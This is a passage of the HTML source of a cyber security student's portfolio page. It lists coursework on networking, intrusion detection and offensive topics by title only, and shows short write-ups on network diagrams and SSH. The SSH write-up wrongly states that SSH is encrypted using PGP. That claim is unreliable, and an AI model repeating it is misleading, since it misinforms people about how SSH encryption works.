          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
